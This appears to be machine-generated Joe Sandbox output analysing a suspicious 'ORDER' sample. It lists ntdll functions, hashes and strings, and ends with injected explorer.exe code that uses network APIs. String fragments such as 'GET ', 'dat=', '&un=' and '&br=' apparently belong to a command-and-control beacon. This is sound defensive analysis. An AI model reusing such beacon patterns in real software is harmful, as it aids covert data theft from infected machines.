Opcode Fuzzy Hash: 146b77c3abc2336b8aa508db11fed403a1ac9d2cc670f3c95c051b323c1399a3
Instruction Fuzzy Hash: FB900231A0540C02D65471584514746000597D1301F55C011A0129654DC7598B5577A5

Function 01182BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3949cf1fafa6988f28e7a9f67b72529e5d573feca98893075e5bdc1e77f09c
Instruction ID: 407f892a39e34516c5b5805b39eabd21189b018460b8341285edd15cec6e5067
Opcode Fuzzy Hash: fe3949cf1fafa6988f28e7a9f67b72529e5d573feca98893075e5bdc1e77f09c
Instruction Fuzzy Hash: 7790023160544C42D64471584504A46001597D1305F55C011A0169694DD7298E55B765

Function 01182AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6789c6f663f114cee821f9c8bb52c3e5a13f58c0c3dc75218aa485cde9147799
Instruction ID: 7b5b6e54d3c3d2d59d4301260de845eeefea64636064ce94773ac678fb99c832
Opcode Fuzzy Hash: 6789c6f663f114cee821f9c8bb52c3e5a13f58c0c3dc75218aa485cde9147799
Instruction Fuzzy Hash: DC9002A1601544924A04B2588504B0A450597E1201B55C016E1159560CC62989519239

Function 01182AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de28d6821e86917d7367a2f07ea26452526c99efc74dd78c96d7039dd1466e7e
Instruction ID: c85038e9d6c54db59b54205f9a01a81134952f3d6d80ccea4bc2134b22b2cd41
Opcode Fuzzy Hash: de28d6821e86917d7367a2f07ea26452526c99efc74dd78c96d7039dd1466e7e
Instruction Fuzzy Hash: CC900225621404020649B558070450B0445A7D7351395C015F151B590CC72589655325

Function 01182D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b786e14abdaf86fbf1de0dfd516863130207c01698e30ee72e320cb7e30e8d7
Instruction ID: 3c48e052ab5b18b2401e9dfad7c68d26e592d43625a1b4f55cfaddfc5c2e8646
Opcode Fuzzy Hash: 5b786e14abdaf86fbf1de0dfd516863130207c01698e30ee72e320cb7e30e8d7
Instruction Fuzzy Hash: 0A90022160544842D60475585508A06000597D1205F55D011A1169595DC7398951A235

Function 01182DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20acb2d0d4920bd98a1e061915169be6cfb9771a91593f0e25f8e1a73b869ef
Instruction ID: 85466e82cd0716d3c6f5520227329c3ebf895b9a2d99aba626d06b4ef6694db1
Opcode Fuzzy Hash: f20acb2d0d4920bd98a1e061915169be6cfb9771a91593f0e25f8e1a73b869ef
Instruction Fuzzy Hash: AA90023164140802D645715845046060009A7D1241F95C012A0529554EC7598B56AB65

Function 01182C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac40c11144f2c89d81ef6927035f9956b24432c419cc5f81b5b2a7bf961ca85
Instruction ID: 4f9104e15158d931f6dfb225c00ee6986bcff24af9195da7602ea381d7edae9d
Opcode Fuzzy Hash: cac40c11144f2c89d81ef6927035f9956b24432c419cc5f81b5b2a7bf961ca85
Instruction Fuzzy Hash: 4D90023160140C42D60471584504B46000597E1301F55C016A0229654DC719C9517625

Function 01182CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 674dfd3653c868597b75d958891650ca6acc499957e2dfb7fb482c9328b813d2
Instruction ID: eb1632c5ecca65c7390a49714d8a7bd4c267c93781530100fb189fa1450e7963
Opcode Fuzzy Hash: 674dfd3653c868597b75d958891650ca6acc499957e2dfb7fb482c9328b813d2
Instruction Fuzzy Hash: CA900221A0540802D64471585518706001597D1201F55D011A0129554DC75D8B5567A5

Function 01182CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 035dcafaf36e38f550e8edb957800db54e096a255650fdc8ab8f63831a6d1f5d
Instruction ID: 6b910e5e7b22a61f9829f952392c8feca36154478e16c1012e5e632268763436
Opcode Fuzzy Hash: 035dcafaf36e38f550e8edb957800db54e096a255650fdc8ab8f63831a6d1f5d
Instruction Fuzzy Hash: 7C90023160140803D60471585608707000597D1201F55D411A0529558DD75A89516225

Function 01182F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88edafaab907f73522e5bcfb451a07af3067cc91f778770d39422dccc9c9e8fc
Instruction ID: 889b18005658c252d34282b1f044931eab52c92ade28d659ab90fbae6e294a2c
Opcode Fuzzy Hash: 88edafaab907f73522e5bcfb451a07af3067cc91f778770d39422dccc9c9e8fc
Instruction Fuzzy Hash: B890026161140442D60871584504706004597E2201F55C012A2259554CC62D8D615229

Function 01182FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e006bcb3b33859f9cc816a343d67de00955008bb87a86001585e4dfd24f80bf5
Instruction ID: b0acb2bac9d1ec43847d5cfba919e21b3871a904e6a0d335b30ebf301061e6e9
Opcode Fuzzy Hash: e006bcb3b33859f9cc816a343d67de00955008bb87a86001585e4dfd24f80bf5
Instruction Fuzzy Hash: 9490023160180802D60471584908747000597D1302F55C011A5269555EC769C9916635

Function 01182E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c023c9aa22db75295525b50477b1aa385b53cee29d096b0e7afa30a67a388df4
Instruction ID: d9851a85df3b318350d58a98d6c267f44791816021daae1c6043a17baa037b3e
Opcode Fuzzy Hash: c023c9aa22db75295525b50477b1aa385b53cee29d096b0e7afa30a67a388df4
Instruction Fuzzy Hash: 3B90022170140802D606715845146060009D7D2345F95C012E1529555DC7298A53A236

Function 01182EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776e9e8a0714faf0d3f63563c778e4c2d738628cb04352997c14f9612ce5419f
Instruction ID: 3ec936a56750f80bca4f77ceb99008f9acc82191a06ce1aa36c264b0eb0cbdde
Opcode Fuzzy Hash: 776e9e8a0714faf0d3f63563c778e4c2d738628cb04352997c14f9612ce5419f
Instruction Fuzzy Hash: A790026160180803D64475584904607000597D1302F55C011A2169555ECB2D8D516239

Function 01183010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
Instruction ID: 600b37099330be1b0c83f0931be31060b0a272803b8a9e48d4e8541aea0725eb
Opcode Fuzzy Hash: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
Instruction Fuzzy Hash: B490022160184842D64472584904B0F410597E2202F95C019A425B554CCA1989555725

Function 01183090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
Instruction ID: c5a59619c55f27e4808ac809120ecf237e2709073a495f7d00657f72810e6375
Opcode Fuzzy Hash: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
Instruction Fuzzy Hash: 3990022164140C02D644715885147070006D7D1601F55C011A0129554DC71A8A6567B5

Function 011835C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
Instruction ID: c69c9fc33a7f4114a80cc5d3d98ced325acaacba2db3faa974abbb3cf96745a6
Opcode Fuzzy Hash: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
Instruction Fuzzy Hash: 15900231A0550802D60471584614706100597D1201F65C411A0529568DC7998A5166A6

Function 011839B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
Instruction ID: f1312ad86998376537bfefb9ed775953282df45adb6965f87807943ef8526bd7
Opcode Fuzzy Hash: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
Instruction Fuzzy Hash: B490022164545502D654715C45046164005B7E1201F55C021A0919594DC65989556325

Function 01183D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
Instruction ID: da17f8620cf5c627ab2d50de54acbed0263c0aef1acacf6a69e0a0736d723b5b
Opcode Fuzzy Hash: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
Instruction Fuzzy Hash: 67900231602405429A4472585904A4E410597E2302B95D415A011A554CCA1889615325

Function 01183D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
Instruction ID: 1b727cb4021aa1562d745d7d74c6e0ea986f35873c178209b7ba02a95b05feca
Opcode Fuzzy Hash: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
Instruction Fuzzy Hash: FA90023560140802DA1471585904646004697D1301F55D411A0529558DC75889A1A225

Function 01182C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 0075205a8685af95dc3ad3e065614918109edc0fff6d869f7f2599a636ebb662
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01182890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0118293C
___swprintf_l.LIBCMT ref: 0118295E
___swprintf_l.LIBCMT ref: 011829A3
___swprintf_l.LIBCMT ref: 011BA52E

Strings

:%u.%u.%u.%u, xrefs: 011BA5B8
::%hs%u.%u.%u.%u, xrefs: 011BA527
ffff:, xrefs: 011BA504
::ffff:0:%u.%u.%u.%u, xrefs: 011BA54E

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0

Function 011F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 011F24A6
___swprintf_l.LIBCMT ref: 011F24E2
___swprintf_l.LIBCMT ref: 011F257D
___swprintf_l.LIBCMT ref: 011F25A3
___swprintf_l.LIBCMT ref: 011F25C8
___swprintf_l.LIBCMT ref: 011F2608

Strings

::%hs%u.%u.%u.%u, xrefs: 011F249E
:%u.%u.%u.%u, xrefs: 011F25FF
::ffff:0:%u.%u.%u.%u, xrefs: 011F24DA
ffff:, xrefs: 011F247D, 011F249D

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
Instruction ID: b48932e4e2b2988d452666c421728d361617968f38b1710bd57b9250fc561fc5
Opcode Fuzzy Hash: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
Instruction Fuzzy Hash: 94510675A04646AFDB38DF9CC8909BFBBF9EB48200B04845DE6A6D7641E7B4DA40C760

Function 01177630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 011B46A0
Execute=1, xrefs: 011B4713
CLIENT(ntdll): Processing section info %ws..., xrefs: 011B4787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011B46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011B4655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011B4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011B4725

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
Instruction ID: 5a064d150f2aa202352219ff063d68271cdff5cbeda218f01088ee5c1b9e6775
Opcode Fuzzy Hash: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
Instruction Fuzzy Hash: 8B51FB31A0021A7AEF1DEBA8EC9DFED77B9AF14704F0400A9E605A72C1E7719A45CF51

Function 0118B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0118B6BF

Strings

-, xrefs: 0118B650
0, xrefs: 0118B695
0, xrefs: 0118B66F
+, xrefs: 0118B65A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59

Function 011F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 011F214F
___swprintf_l.LIBCMT ref: 011F2172

Strings

]:%u, xrefs: 011F2169
%%%u, xrefs: 011F2146
[, xrefs: 011F212B

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
Instruction ID: d4c53aeaa99499daddf9d6f500d89c21c6b3213981457bf18748543585adddbd
Opcode Fuzzy Hash: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
Instruction Fuzzy Hash: 5621657AA00119ABDB19DF79DC40AEFBBF8EF54644F44011AEA15D3200E730D9018BA5

Function 0116F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 011B031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011B02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011B02BD

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
Instruction ID: e1650a682ee27013a11818285e0f8c5e74d617494d06113a53f383a19b2fcd1a
Opcode Fuzzy Hash: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
Instruction Fuzzy Hash: CCE10E302087429FD72DCF28D894B6ABBE4BB88314F144A5DF5A58B2E1D735D856CB42

Function 0117BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 011B7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011B7B7F
RTL: Resource at %p, xrefs: 011B7B8E

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
Instruction ID: a91fb0a753d1051d5ea198f9884b8ee185fc1198a308fa2d9ccc9c6a5a31793a
Opcode Fuzzy Hash: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
Instruction Fuzzy Hash: F041E2313097029FD728DE29C940B6AB7E5EF99B10F100A1DF95AD7780DB31E5058F96

Function 0117B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011B728C

Strings

RTL: Re-Waiting, xrefs: 011B72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011B7294
RTL: Resource at %p, xrefs: 011B72A3

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
Instruction ID: 7d970548414c21649d9c471b49787a0bcf046a689a1d6e5f7c95ecce3b3f41da
Opcode Fuzzy Hash: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
Instruction Fuzzy Hash: 7141F031604206ABC729DE29CC81BAAB7B5FFA4714F100619F956AB3C0DB31E852CBD5

Function 011F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 011F238D
___swprintf_l.LIBCMT ref: 011F23B3

Strings

]:%u, xrefs: 011F23AA
%%%u, xrefs: 011F2384

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
Instruction ID: 59df2f3e9c5005c84ae6ad619095c4f6f4bbf069506ccd63b602cf81349ba877
Opcode Fuzzy Hash: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
Instruction Fuzzy Hash: 01316672A006199FDB28DF2DDC40BEEB7F8FB58614F444559E949E3240EB30DA458FA0

Function 01187D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01187E8B

Strings

-, xrefs: 01187DDD
+, xrefs: 01187DE8

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52

Function 01149126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01149191
@, xrefs: 01149175

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
Opcode Fuzzy Hash: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1

Analysis Process: explorer.exePID: 1028, Parent PID: 6644COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	16

Executed Functions

Function 0F004F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0F00512E
setsockopt.WS2_32 ref: 0F005830
recv.WS2_32 ref: 0F005859

Strings

&sql, xrefs: 0F005471
tion, xrefs: 0F005331
ose, xrefs: 0F00533F
: cl, xrefs: 0F005338
&br=, xrefs: 0F005509
Co, xrefs: 0F005323
nnec, xrefs: 0F00532A
GET , xrefs: 0F005318
&un=, xrefs: 0F0054F1
dat=, xrefs: 0F005290

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
